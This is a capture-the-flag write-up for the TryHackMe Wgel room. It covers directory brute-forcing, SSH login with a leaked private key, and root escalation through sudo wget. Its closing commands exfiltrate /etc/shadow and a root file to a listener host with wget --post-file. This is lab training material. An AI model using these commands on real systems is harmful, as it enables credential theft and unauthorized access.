# TryHackMe Wgel CTF room
* https://tryhackme.com/room/wgelctf

## Scanning
* Nmap reports :
    * Apache HTTP on 80/tcp
    * OpenSSH on 22/tcp
* See source on the map web page : `jessie` would be a username
* `gobuster dir -u http://10.10.85.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100`
    * `/sitemap` is hosting a web page
* `gobuster dir -u http://10.10.85.98/sitemap -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100`
    * Nothing much
* `gobuster dir -u http://10.10.85.98/sitemap -w /usr/share/wordlists/dirb/big.txt -t 100`
    * Very nice : `/sitemap/.ssh`
    * Contains an `id_rsa` file

## Initial Acccess
* Save the id_rsa file from the website
* `chmod 600 id_rsa`
* `ssh -i id_rsa jessie@10.10.85.98`
    * Works!
* First flag in : `/home/jessie/Documents/user_flag.txt`

## Privilege Escalation
* `sudo -l` : `(root) NOPASSWD: /usr/bin/wget`
* https://gtfobins.github.io/gtfobins/wget/#sudo
* https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/
* You can use wget to send any file to your webserver. Running as root, I can send the shadow file or else
* Start a netcat listener : `nc -lvp 80 > flag2`
* Send the flag 2 file : `sudo wget --post-file=/root/root_flag.txt 10.6.28.1`
* Or send the shadow file : `sudo wget --post-file=/etc/shadow 10.6.28.1`






